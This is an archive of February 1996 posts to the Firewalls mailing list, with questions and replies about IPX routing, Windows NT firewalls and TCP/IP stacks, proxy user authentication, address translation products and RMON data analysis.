~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Re IPX routing

paul.carrol@medaphis.com offered up:
>I am about to setup a firewall for our Internet link.
>
>I have recently learned that we are bringing in an X.25 line from Compuserve.
>The line runs into a Compuserve box that resides here that we do NOT control.
>
>From the Compuserve box, a line runs into one of our router interfaces.
>
>Obviously, I want to firewall this link as well...
>It passes IPX and TCP/IP, and needs to do both.
>
>The problem I have is with IPX. We have decided on Raptor Eagle as our firewall.
>It will run on a SUN Sparc 20, and it will NOT pass IPX.
>
>Any suggestions?

Well .. not sure whether this works or not, but I'd be interested in comments myself. Is IPX critical for you? I ask because we're running IP and IPX on our LAN here, and I'm being pushed to allow both across our firewalling mechanism. Our Netware guy said to me the other day that we needed IPX as some products actually require IPX in order to work. This sounds like snake oil to me - I'd have thought that the underlying protocol - whether IP or IPX should make no difference whatsoever.
Any comments on this? It's also been suggested to me that Novell/IP works by simply encapsulating IPX within an IP packet - this doesn't quite sound like full IP to me. Can anyone comment upon this? If we can move everything to IP, then our problems potentially disappear here, and I needn't route IPX at all. Sound easy to me from there (ish!).

I wonder Paul, whether you could do something along these lines? I wonder everyone whether you all think I'm pouring snake oil around the place too? :)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`

it is true that some netware products use ipx/spx directly. whether they would work properly, or at all, with netware/ip is something you would have to test (unfortunately).

Regards
+++++++++++++++++++++++++++++++++++++++
+ Neil Lehrer
+ U.S. Information Agency
+ Networks and Systems Support Division
+
+ voice 202 619-0903
+ fax 202 619-3883
+ internet nlehrer@usia.gov
+
+ "oh what a tangled net we weave
+ when we seek to retrieve."
+
+++++++++++++++++++++++++++++++++++++++

From firewalls-owner Wed Feb 7 09:24:44 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA14114 for firewalls-outgoing; Wed, 7 Feb 1996 08:41:56 -0800 (PST)
Received: from server1.startel.com.ar ([200.26.1.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA14083 for ; Wed, 7 Feb 1996 08:41:43 -0800 (PST)
Received: from [200.26.8.62] (ts1-ppp15.starnet.net.ar) by server1.startel.com.ar with SMTP id AA18039 (5.67b/IDA-1.4.4 for ); Wed, 7 Feb 1996 13:37:32 +0300
Message-Id: <199602071037.AA18039@server1.startel.com.ar>
To: "firewalls@GreatCircle.com"
Subject: DNS for NT
Date: Thu, 08 Feb 96 13:41:42 -0500
From: Eduardo Torres
X-Mailer: E-Mail Connection v2.5.03
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

-- [ From: Eduardo Torres * EMC.Ver #2.5.02 ] --

Can anyone recommend a good DNS solution for NT?
Thank you,
Eduardo
--
-------------------------------------------
Eduardo Jose Torres
STARTEL S.A.
Marketing - Internet
Leandro N. Alem 628 2do Piso
1001 Buenos Aires Argentina
Tel: 54-1-318-6000 Fax: 54-1-318-6376
-------------------------------------------

From firewalls-owner Wed Feb 7 09:53:43 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA14283 for firewalls-outgoing; Wed, 7 Feb 1996 08:45:32 -0800 (PST)
Received: from wizard.pn.com (wizard.pn.com [204.96.36.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA14261 for ; Wed, 7 Feb 1996 08:45:25 -0800 (PST)
Received: from synaxis.com (mail.synaxis.com [204.96.42.66]) by wizard.pn.com (8.6.12) with SMTP id LAA04098 for ; Wed, 7 Feb 1996 11:44:36 -0500
Received: from Synaxis-Message_Server by synaxis.com with Novell_GroupWise; Wed, 07 Feb 1996 11:43:10 -0500
Message-Id:
X-Mailer: Novell GroupWise 4.1
Date: Wed, 07 Feb 1996 11:19:29 -0500
From: Chris Jenkins
To: doug@fc.com, firewalls@GreatCircle.COM
Subject: NT Firewalls/Web Servers -Reply
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Raptor Systems makes one of the only firewall products I know of for NT. I will be getting an eval in to test it out...

Chris Jenkins
cjenkins@synaxis.com

>>> Douglas M. Todd, Jr. 02/07/96 09:06am >>>
Does anyone know of any good NT Firewalls and Web Servers?

==DMT>
--
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>Douglas M. Todd, Jr. fc.com, Inc.
One Federal Street BLD 102
Springfield, MA 01105
PHN: 413-733-7333 FAX: 413-733-7725
Email: Doug@fc.com or Bunyan@msn.com

From firewalls-owner Wed Feb 7 09:57:12 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA13341 for firewalls-outgoing; Wed, 7 Feb 1996 08:28:17 -0800 (PST)
Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA13317 for ; Wed, 7 Feb 1996 08:28:08 -0800 (PST)
Received: by Disclosure.COM (4.1/SMI-4.1) id AA19351; Wed, 7 Feb 96 11:30:27 EST
Date: Wed, 7 Feb 1996 11:30:25 -0500 (EST)
From: Scott Barman
To: Russ
Cc: "'Jeromie Jackson'" , "'Firewalls'"
Subject: RE: NT's TCP/IP stack
In-Reply-To: <01BAF4F6.E8D957C0@rwcooper.RC.Toronto.on.ca>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 7 Feb 1996, Russ wrote:
> [Firewall relevance]
> To some extent, there may be some relief to all of this on the horizon.
> With the introduction of Raptor and soon Network-1 into the Windows NT
> realm of Firewalls, there are seriously security conscious individuals who
> will have to track these changes to see if they affect their product.
> Hopefully this will lead to increased scrutiny of the product from a
> specifically secure standpoint.

There are three firewalls built on top of NT, not including the vaporware Micro$haft themselves are touting. I have been in contact with someone who has evaluated two of them. Unfortunately, I cannot say who or give further details (this person will be publishing this information in one of the "major" industry rags), but let's just say that my suspicion has been confirmed: you cannot use these systems for anything faster than a 64Kbps connection. T1, or even fractional T1 (128Kbps), start showing failure.
> [Shameless plug]
> Of course, with the just announced strategic partnership between MCI and
> Microsoft (and of course, SHL), and the fact that MCI will be hosting MSN
> on the Internet, we will hopefully see lots more NT boxes on the Internet,
> again, forcing people to look more closely at the viability of securing NT
> boxes.

Maybe Micro$loth is hoping Vint Cerf will help their sagging system. Then again companies are into prostitution for the sake of the bottom line--read "On the Line" regarding this statement and MCI.

Hopefully, when folks put NT on the internet, they will find the same thing I found through experimentation: it has multitasking that can't get out of its own way, it can't handle the load of a medium-low environment, and if something goes wrong, there isn't a quick interface to fix things (bypassing that maze of twisty little menus all different!).

> There's definitely something wrong with someone like me who lives for these
> types of questions, I guess I just love the controversy! ;-]

Yea, it's called living the hype and believing the b.s. from marketing machines. No controversy here--especially when I don't believe what I read or hear from know M.$.... err... b.s. artists.

scott barman
--
scott barman          DISCLAIMER: I speak to anyone who will listen,
scott@disclosure.com              and I speak only for myself.
barman@ix.netcom.com
"Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming."
- scott barman

From firewalls-owner Wed Feb 7 10:01:54 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA14528 for firewalls-outgoing; Wed, 7 Feb 1996 08:52:08 -0800 (PST)
Received: from wizard.pn.com (wizard.pn.com [204.96.36.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA14522 for ; Wed, 7 Feb 1996 08:52:00 -0800 (PST)
Received: from synaxis.com (mail.synaxis.com [204.96.42.66]) by wizard.pn.com (8.6.12) with SMTP id LAA04470 for ; Wed, 7 Feb 1996 11:51:06 -0500
Received: from Synaxis-Message_Server by synaxis.com with Novell_GroupWise; Wed, 07 Feb 1996 11:49:52 -0500
Message-Id:
X-Mailer: Novell GroupWise 4.1
Date: Wed, 07 Feb 1996 11:26:12 -0500
From: Chris Jenkins
To: winnt-l@eva.dc.lsoft.com, jeromie@garrison.com, firewalls@greatcircle.com, SATEESHB@inf.com
Subject: Re: NT's TCP/IP stack + NetManage NEWT conflict. -Reply
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

all of the newest (and even WFW311) come with a free TCPIP stack. Third party applications like Chameleon, LanWorkPlace, etc.... come with their own stacks. In most cases, you should be able to get applications (Telnet, FTP, mail, etc) from one third-party product to work over another's TCP/IP stack. This is where the WINSOCK standard comes in. More specialized TCP/IP functions running on Windows (such as XServer, 3270, etc) may require a stack/Winsock specific to that particular product. Since MS gives you TCP/IP and WINSOCK, most third party applications should be able to run. If I recall correctly, I think that some of Chameleon's applications will run on the MS tcp/ip stack.

Anyway...... just been my experience

Chris Jenkins
cjenkins@synaxis.com

>>> SATEESHB 02/07/96 08:07am >>>
well, I don't know how relevant the reply is to your needs. I faced problems with NetManage Chameleon version 5.0. It starts a program called NEWT (NetManage Enhanced Windows Tcp/IP).
When I try to run one of my programs which is a service from the service control panel, it hangs. Even that cute messagebox "Attempting to start Service" with the small clock also doesn't come up. After wasting many hours and losing sleep, I found out that if I rename NEWT.exe to some other name so it would fail to get loaded automatically, the SCM behaves properly. I feel NEWT tcp/ip might be conflicting with NT TCP/IP. Why the NetManage guys should have a different program for this when NT provides one is beyond my comprehension.

It would be of help to me if someone can tell me how the Service Control Manager is related to TCP/IP here. (Is it something to do with the RPC stuff they talk about for starting services remotely? In my case I started locally.)

Any discussion on the NT TCP/IP stack will be greatly appreciated.

Regards,
Sateesh Babu N S, Systems Analyst, Infosys Technologies Ltd, Bangalore India.

______________________________ Reply Separator _________________________________
Subject: NT's TCP/IP stack
Author: jeromie@garrison.com (Jeromie Jackson) at SMTP_GW
Date: 2/6/96 7:03 PM

As we have all seen in the last few weeks, there have been several people who have been ragging on the Windows NT TCP/IP stack. I would like to hear some comments on real problems that have been detected. I have looked around the net, although no hard-fact information could I find.

NT appears to have some good qualities, ease-of-use, although I am unsure about several things. The integrity of the OS. Nobody can test it well. Who's to say what holes are under the hood that nobody has a good chance to look at. The TCP/IP stack has been said to have problems. They are not a security company, therefore I am very unwilling to assume they have done the proper testing for security purposes. For that matter, I am unwilling to assume the product isn't full of "Microsoft Features" that are undocumented.

I would be very interested in hearing about these issues.
Jeromie Jackson
Director of Technology
Garrison Associates
jeromie@garrison.com

From firewalls-owner Wed Feb 7 10:06:16 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA15908 for firewalls-outgoing; Wed, 7 Feb 1996 09:30:30 -0800 (PST)
Received: from smtp-gw01.ny.us.ibm.net ([165.87.194.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA15903 for ; Wed, 7 Feb 1996 09:30:26 -0800 (PST)
From: pcuser@slip133-140.dc.us.ibm.net
Received: (from uucp@localhost) by smtp-gw01.ny.us.ibm.net (8.6.9/8.6.9) id RAA79113 for <@smtp-gw01.ny.us.ibm.net:firewalls@greatcircle.com>; Wed, 7 Feb 1996 17:29:37 GMT
Message-Id: <199602071729.RAA79113@smtp-gw01.ny.us.ibm.net>
Received: from slip133-140.dc.us.ibm.net(129.37.133.140) by smtp-gw01.ny.us.ibm.net via smap (V1.3mjr) id smaiNwCKs; Wed Feb 7 17:29:26 1996
Date: Tue, 6 Feb 96 10:04:23 PST
Subject: Firewalls Product Comparison
To: @smtp-gw01.ny.us.ibm.net:firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi guys,

I need to prepare a comparative study between Sun's Firewall 1 and IBM NetSP, for the end of this week. Does anyone know where I could find some interesting articles concerning both of these products? Any help would be appreciated.
Wilmer Caripe
EMSCA - ENGINEERING AND MANUFACTURING SYSTEMS
CARACAS, VENEZUELA

From firewalls-owner Wed Feb 7 10:08:51 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA15536 for firewalls-outgoing; Wed, 7 Feb 1996 09:20:20 -0800 (PST)
Received: from arthur.crpht.lu (arthur.crpht.lu [158.64.4.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA15531 for ; Wed, 7 Feb 1996 09:20:09 -0800 (PST)
Received: from cnsmac1.crpht.lu by arthur.crpht.lu with SMTP (1.37.109.4/16.2) id AA15004; Wed, 7 Feb 96 18:18:54 +0100
X-Sender: security@arthur.crpht.lu
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Wed, 7 Feb 1996 18:24:43 +0100
To: firewalls-digest@GreatCircle.COM
From: security@crpht.lu (Bruno MAMER)
Subject: Firewall, yes, but policy first !
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi everyone,

Just a small question, last August, "Jim Carroll" talked of the book "Information Security Policies Made Easy". We've decided to buy it but lack references. Does anyone have the editor, ISBN number?

TIA
Bruno
_________________________________________________________________________
Bruno MAMER bruno.mamer@crpht.lu
Centre de Recherche Public Henri Tudor
Computing and Network Services
Our local archive on security : http://www.crpht.lu/CNS/html/PubServ/Security/security-home.html
-------------------------------------------------------------------------

From firewalls-owner Wed Feb 7 10:38:49 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA18861 for firewalls-outgoing; Wed, 7 Feb 1996 10:23:46 -0800 (PST)
Received: from garrison.com. (garrison.garrison.com [199.1.78.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA18846 for ; Wed, 7 Feb 1996 10:23:38 -0800 (PST)
Received: by garrison.com.
(4.1/Nutered Mailer) id AA05279; Wed, 7 Feb 96 12:20:27 CST
Date: Wed, 7 Feb 96 12:20:27 CST
From: jeromie@garrison.com (Jeromie Jackson)
Message-Id: <9602071820.AA05279@garrison.com.>
To: firewalls@greatcircle.com, zuhn@sctc.com
Subject: Re: User level firewall / proxy authentication
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> // > Are there any firewall or proxy server products available that will allow
> // > outgoing user authentication based upon a user id, rather than an IP
> // > address?

> As for the safety, there are usually a variety of means available for user
> authentication. Those I have seen in the market range from insecure
> username & reusable passwords (a la Unix passwords) to software based
> challenge-response systems (LOCKout or S/Key) to hardware based token
> cards of some form or another (SecurID, SNK). A common tradeoff in
> authentication systems is price vs. unspoofability.

The one thing to remember when using One-Time Password products is that only the initial login conversation is authenticated. If a user authenticates himself to a machine, and then starts a session, he is still vulnerable to hijacks, sniffing & spoofing. If you were to use an encryption device such as the Persona card, or the Smartcat product, or Cryptocard, you will have continual authentication & confidentiality. This continual encryption will patch up the above mentioned weaknesses that OTP products do not address.
Jeromie Jackson
Garrison Technologies
jeromie@garrison.com

From firewalls-owner Wed Feb 7 11:14:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA20417 for firewalls-outgoing; Wed, 7 Feb 1996 10:48:22 -0800 (PST) Received: from netcom.netcom.com (netcom.netcom.com [192.100.81.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA20410 for ; Wed, 7 Feb 1996 10:48:17 -0800 (PST) Received: by netcom.netcom.com (8.6.12/Netcom) id KAA29708; Wed, 7 Feb 1996 10:05:05 -0800 Date: Wed, 7 Feb 1996 10:04:59 -0800 (PST) From: Bob Bosen Subject: Re: User level firewall / proxy authentication To: Graham Jose cc: "firewalls@GreatCircle.COM" In-Reply-To: <3117F7B3.3647@mecx05.colesmyer.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Wed, 7 Feb 1996, Graham Jose wrote:
> Are there any firewall or proxy server products available that will allow
> outgoing user authentication based upon a user id, rather than an IP address?
>
> Our users are mobile and this makes it difficult to restrict internet access on a
> per user basis, since their source IP address is likely to change.
>
> Thanks,
>
> Graham
> --
> Graham Jose, Technical Analyst, Information Systems Security
> Retail Technology Services, Coles Myer Limited (Australia)
> Voice: +613 9483 7613 Email: gjose@mecx05.colesmyer.com.au
>

Most existing firewall products can be supplemented with an interface to some kind of enhanced user authentication. This may use a published protocol such as XTACACS, TACACS+, RADIUS, or (our own) EASSP, or it may use a proprietary protocol. Most of the enhanced user authentication vendors market some kind of authentication server(s) that include (at least) a proprietary API or (hopefully) one or more published APIs and/or support one or more of the aforementioned protocols.
You can obtain free authentication protocol server daemons supporting the aforementioned protocols from several of the more popular vendors of routers and commservers and firewalls.

When you are thinking about authenticating user identity on the Internet, make sure your implementation is non-replayable. Stealing memorized passwords would be your biggest threat otherwise. Our anonymous ftp archives have a lot of this stuff.

Regards,
Bob Bosen
Enigma Logic Inc. 2151 Salvio St. #301 Concord, CA 94520 USA
Tel: +1 510 827-5707 Internet: bbosen@netcom.com
http://www.safeword.com
ftp://ftp.safeword.com/download/ or ftp://ftp.enigmalogic.com
**************************************************************************
* "It wasn't me!!! Somebody must have captured my username/password!!!" *
**************************************************************************

From firewalls-owner Wed Feb 7 12:19:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA23583 for firewalls-outgoing; Wed, 7 Feb 1996 11:33:42 -0800 (PST) Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA23574 for ; Wed, 7 Feb 1996 11:33:29 -0800 (PST) Received: from cixgate by relay2.UU.NET with SMTP id QQabxu25738; Wed, 7 Feb 1996 14:31:13 -0500 (EST) Received: from manzanita.DEV.3Com.COM.noname ([139.87.180.206]) by cixgate (4.1/SMI-4.1/3com-cixgate-GCA-931027-01) id AA20468; Wed, 7 Feb 96 11:40:29 PST Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) id AA00903; Wed, 7 Feb 96 11:25:07 PST Date: Wed, 7 Feb 96 11:25:07 PST From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9602071925.AA00903@manzanita.DEV.3Com.COM.noname> To: firewalls@greatcircle.com Subject: Cost of Address Translation systems Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Can anyone give me the costs (hardware and software) for address translation systems, hopefully along with their names?
Thanks,
BobK

From firewalls-owner Wed Feb 7 13:09:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA28114 for firewalls-outgoing; Wed, 7 Feb 1996 12:49:21 -0800 (PST) Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA28103 for ; Wed, 7 Feb 1996 12:49:16 -0800 (PST) From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id PAA09349; Wed, 7 Feb 1996 15:48:13 -0500 (EST) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id PAA05677; Wed, 7 Feb 1996 15:48:11 -0500 (EST) Date: Wed, 7 Feb 1996 15:48:11 -0500 (EST) Message-Id: <199602072048.PAA05677@SPARKY.CF.CS.YALE.EDU> To: doug@fc.com, firewalls@GreatCircle.COM Subject: Re: NT Firewalls/Web Servers Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Doug@fc.com wrote:
>Does anyone know of any good NT Firewalls and Web Servers?

Have you looked at WinGate? It is a proxying system for Windows 95 and NT which allows you to use one machine which dials up an ISP to act as a proxy for your entire network. It can also straddle two ethernets instead. They have proxies similar to TIS FWTK, a nice generic proxy with flexible configuration rules, and a SOCKS implementation.

There are a number of different good Web Servers for NT (Netscape's, Microsoft's, O'Reilly & Assoc.
WebSite, etc.):
http://home.netscape.com/
http://www.microsoft.com/
http://website.ora.com/

- Morrow

From firewalls-owner Wed Feb 7 13:31:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA23659 for firewalls-outgoing; Wed, 7 Feb 1996 11:35:06 -0800 (PST) Received: from foxtrot.worldcom.com (foxtrot.worldcom.com [198.64.193.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA23644 for ; Wed, 7 Feb 1996 11:34:49 -0800 (PST) Received: (from smtp@localhost) by foxtrot.worldcom.com (8.7.1/8.6.9) id NAA19803 for ; Wed, 7 Feb 1996 13:24:34 -0600 (CST) Received: from samba.worldcom.com(198.64.193.32) by foxtrot.worldcom.com via smap (V1.3) id sma019734; Wed Feb 7 13:23:53 1996 Received: (smtp@localhost) by samba.worldcom.com (8.6.11/8.6.9) id NAA08549 for ; Wed, 7 Feb 1996 13:23:51 -0600 Received: from samba.worldcom.com(198.64.193.32) by samba.worldcom.com via smap (V1.3) id sma008544; Wed Feb 7 13:23:28 1996 Date: Wed, 7 Feb 1996 13:23:28 -0600 (CST) From: Robert Dana Reply-To: Robert Dana Subject: I want details!!! Re: NT's TCP/IP stack To: firewalls@greatcircle.com In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

OK, I'm getting really frustrated about the lack of details about NT's deficiencies. I couldn't care less about OS bigotry; I'll use whatever systems meet my needs (which often include security). I have seen, over and over again, posts that basically say "I've personally verified that NT sucks for {security, networking, multitasking, Internet services}. Don't believe the MS marketing hype".
For example, Scott Barman writes:
> Hopefully, when folks put NT on the internet, they will find the same
> thing I found through experimentation: it has multitasking that can't
> get out of its own way, it can't handle the load of a medium-low
> environment, and if something goes wrong, there isn't a quick interface
> to fix things (by passing that maze of twisty little menus all
> different!).
[...]
> Yea, it's called living the hype and believing the b.s. from marketing
> machines. No controversy here--especially when I don't believe what I
> read or hear from know M.$.... err... b.s. artists.

I don't mean to single Scott out; his is just the most recent example. We can bitch about MS's unsubstantiated marketing claims all we want, but making similarly unsubstantiated claims opposing them doesn't help at all. Exactly what are the deficiencies of the IP or TCP implementations of NT for the environment most of us care about (IP over ethernet)? Why won't a firewall on NT be capable of handling a connection faster than 64k?

One of the most valuable things about forums like this is the potential to share information that cuts through all the BS that floats around out there in the form of marketing materials and vendor-biased trade publications. I'm constantly disappointed about how little valuable knowledge is really posted. And please, keep your OS religion to yourself. Sure, UNIX is what I'm most comfortable with for now, but that doesn't change the fact that I have to deal with NT whether I want to or not.

GIVE US FACTS.
-Robert
--
Robert Dana (713) 650-6522 x240
Director of Network Services
WorldCom, the International Network for Lotus Notes

From firewalls-owner Wed Feb 7 13:39:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA29407 for firewalls-outgoing; Wed, 7 Feb 1996 13:16:19 -0800 (PST) Received: from eagle.wd.cubic.com ([149.63.94.9]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA29402 for ; Wed, 7 Feb 1996 13:16:15 -0800 (PST) Received: (mischler@localhost) by eagle.wd.cubic.com (8.6.9/8.3) id NAA08977; Wed, 7 Feb 1996 13:15:20 -0800 Date: Wed, 7 Feb 1996 13:15:20 -0800 From: Dave Mischler Message-Id: <199602072115.NAA08977@eagle.wd.cubic.com> To: bobk@manzanita.DEV.3Com.COM, firewalls@GreatCircle.COM Subject: Re: Cost of Address Translation systems Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

IPRoute runs on a PC and is shareware for $50.
http://www.mischler.com/iproute/

From firewalls-owner Wed Feb 7 13:42:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA29452 for firewalls-outgoing; Wed, 7 Feb 1996 13:17:24 -0800 (PST) Received: from count04.mry.scruznet.com (count04.mry.scruznet.com [204.147.227.68]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA29443 for ; Wed, 7 Feb 1996 13:17:17 -0800 (PST) From: firewalls@count04.mry.scruznet.com Received: from count04.mry.scruznet.com (localhost [127.0.0.1]) by count04.mry.scruznet.com (8.7.3/8.7.1) with ESMTP id NAA04755; Wed, 7 Feb 1996 13:09:56 -0800 (PST) Message-Id: <199602072109.NAA04755@count04.mry.scruznet.com> To: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) cc: firewalls@GreatCircle.COM, firewalls@count04.mry.scruznet.com Subject: Re: Cost of Address Translation systems In-reply-to: Your message of "Wed, 07 Feb 1996 11:25:07 PST."
<9602071925.AA00903@manzanita.DEV.3Com.COM.noname> Date: Wed, 07 Feb 1996 13:09:56 -0800 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Try Darren Reed... he's on the list with ip-filter 3.02b; it has the feature you are requesting.

From firewalls-owner Wed Feb 7 14:16:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01538 for firewalls-outgoing; Wed, 7 Feb 1996 13:52:15 -0800 (PST) Received: from relay2.smtp.psi.net (relay2.smtp.psi.net [38.8.188.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA01533; Wed, 7 Feb 1996 13:52:10 -0800 (PST) Received: from radisys.radisys.com by relay2.smtp.psi.net (8.6.12/SMI-5.4-PSI) id QAA22881; Wed, 7 Feb 1996 16:50:50 -0500 Received: from msmail.radisys.com by radisys.radisys.com id aa01808; 7 Feb 96 13:46 PST Received: by msmail.radisys.com with Microsoft Mail id <31191E61@msmail.radisys.com>; Wed, 07 Feb 96 13:49:21 PST From: Jesse Gambetti To: firewalls-owner Cc: firewalls Subject: Firewall Date: Wed, 07 Feb 96 13:48:00 PST Message-ID: <31191E61@msmail.radisys.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Our company is currently running a SCO box as our gateway w/ a netblazer doing packet filtering and a 14.4k link to the net. I've taken over internet as one of my primary responsibilities here, and working with the engineers that maintained the inet access here before, we've decided to switch to BSDi on our gateway; we ordered a CISCO firewall router that will support a new 256k partial frame t1. Being new to firewalls myself, I'm kind of reading as much as I can while learning the admin side of BSDi. My question is this: will the Cisco router provide enough security for our company? We are starting to become very concerned with security. If you need any other info I'll be happy to provide it if I know it.
Jesse Gambetti
IS Technician
jgambetti@radisys.com

From firewalls-owner Wed Feb 7 15:10:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02439 for firewalls-outgoing; Wed, 7 Feb 1996 14:08:40 -0800 (PST) Received: from smtp-gw01.ny.us.ibm.net ([165.87.194.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA02434 for ; Wed, 7 Feb 1996 14:08:35 -0800 (PST) From: pcuser@slip67-241.ny.us.ibm.net Received: (from uucp@localhost) by smtp-gw01.ny.us.ibm.net (8.6.9/8.6.9) id WAA65987 for < @smtp-gw01.ny.us.ibm.net:Firewalls@GreatCircle.COM>; Wed, 7 Feb 1996 22:07:43 GMT Message-Id: <199602072207.WAA65987@smtp-gw01.ny.us.ibm.net> Received: from slip67-241.ny.us.ibm.net(129.37.67.241) by smtp-gw01.ny.us.ibm.net via smap (V1.3mjr) id smaNZYDe7; Wed Feb 7 22:07:36 1996 Date: Tue, 6 Feb 96 10:04:23 PST Subject: Firewalls Product Comparison To: @smtp-gw01.ny.us.ibm.net:Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi guys,

I need to prepare a comparative study between Sun's Firewall 1 and IBM NetSP, for the end of this week. Does anyone know where I could find some interesting articles concerning both of these products? Any help would be appreciated.
Wilmer Caripe
EMSCA - ENGINEERING AND MANUFACTURING SYSTEMS
CARACAS, VENEZUELA

From firewalls-owner Wed Feb 7 15:18:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02806 for firewalls-outgoing; Wed, 7 Feb 1996 14:15:13 -0800 (PST) Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA02801 for ; Wed, 7 Feb 1996 14:15:08 -0800 (PST) Received: from IMXGATE.COM by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 6453; Wed, 07 Feb 96 17:14:09 EST Received: from oceanspray.com by imxgate.com (IBM VM SMTP V2R3) with TCP; Wed, 07 Feb 96 17:05:14 EST Received: from OCNSPRAY-Message_Server by oceanspray.com with Novell_GroupWise; Wed, 07 Feb 1996 17:11:18 -0500 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Wed, 07 Feb 1996 17:05:24 -0500 From: LLOYD HARTE To: firewalls@greatcircle.com Subject: RMON Data Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Greetings,

This is a little outside of a firewall question, but I was wondering if anyone could point me in the direction of where I could find formulas for analyzing RMON data. I want to calculate things like utilization, error rates, etc. I have looked at one tool, Axon LANreporter, but it only looks at one day's worth of info and I would like to review weeks, months, etc. Any assistance would be great!
LHARTE@OCEANSPRAY.COM

